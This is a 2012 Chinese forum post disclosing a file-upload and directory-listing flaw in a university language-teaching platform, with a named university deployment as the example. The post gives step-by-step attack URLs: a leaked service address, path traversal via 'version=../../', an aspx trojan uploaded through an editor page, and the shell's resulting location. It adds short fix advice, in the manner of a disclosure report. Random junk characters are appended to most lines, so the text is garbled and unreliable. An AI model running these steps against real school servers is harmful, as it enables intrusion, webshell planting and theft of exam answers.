找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2214|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中: ?: F& t' D: Z8 C/ X) M
" u2 Y8 E; P' T4 }6 U
详细说明:4 E( G. Q" D% u/ K- {5 x

+ B! D8 T" a$ B3 w& n3 X以南开大学的为例:
$ \" p6 M* |( y0 }http://222.30.60.3/NPELS
$ @( o+ D0 ~9 I' v  q- KNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址; _  w8 p4 Y% @" `3 m3 F
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
' x5 D: F8 A& A8 G6 Y6 f6 p9 K+ E<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
7 L2 V3 ?1 x8 n7 i</setting>9 |/ i3 s4 A/ M$ Y& U5 C2 S5 |
及版本号3 f% U& N5 j- R+ `% R  F" L
<add key="TVersion" value="1, 0, 0, 2187">) f) W1 t1 i2 X; U- R9 E# V3 Z2 h" N6 I
</add>8 e# E; n! `: ^/ H2 Y
直接访问
; i" r. e$ P- \. khttp://222.30.60.3/NPELS/CommonService.asmx' y+ E- t- Y+ v  y- m4 U( Y
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
. C$ m4 m; t- S7 Yhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21877 B" D. |+ J. ^- U4 \8 T9 A  u6 }
进一步列目录(返回的网页很大,可以直接 wget 下来)
% Q3 M" V$ W* rhttp://222.30.60.3/NPELS/CommonS ... List?version=../../9 c# q- `- s# T6 n9 S
8 K) Y+ S0 i( d7 B% D9 |5 I
发现+ a' b3 V# [4 I8 ]' {( A& i6 Z
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm* r% w4 F( t! ?
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
& C( s- l/ v( n* w  k" P' E上传后继续列目录找到木马地址直接访问即可
- s6 q& \9 A, E- M4 Z* m. W
9 n/ c1 e* t3 V  ]. C* AOOXX" p# ]7 a  @# o* f: }4 q% I

$ O/ i2 k: d! Y8 e5 sGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法0 h  Y: \/ t+ M  [- r7 S
漏洞证明:
' |9 l6 _( T0 f0 y& X" { % U, w' C  g7 C* g4 V( E9 l
列目录:  H- l% _: H, M
http://222.30.60.3/NPELS/CommonS ... List?version=../../- C. G% j5 Z( U4 V+ s' g6 S
文件上传:3 q, K9 @4 a2 w
http://222.30.60.3/npelsv/editor/editor.htm
0 _' M2 I3 B7 B7 @% I3 W
0 @! r8 t6 g: y; G" O7 ]( |4 j  ]上传木马:+ f* S5 v. i, W1 I  S! ^4 \6 b2 _
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx, h7 l# R/ l7 J# y- H
3 ?9 l5 w8 C- T: {
修复方案:
+ ~2 B0 n. W4 ^- P& V好像考试系统必须使用 CommonService.asmx
9 |  L) K( x+ e! T( a7 {" s最好配置文件加密或者用别的方式不让它泄露出来5 t) W  N( E  m4 A
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
. V% b( _2 Y/ V# |# J# [7 \& w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表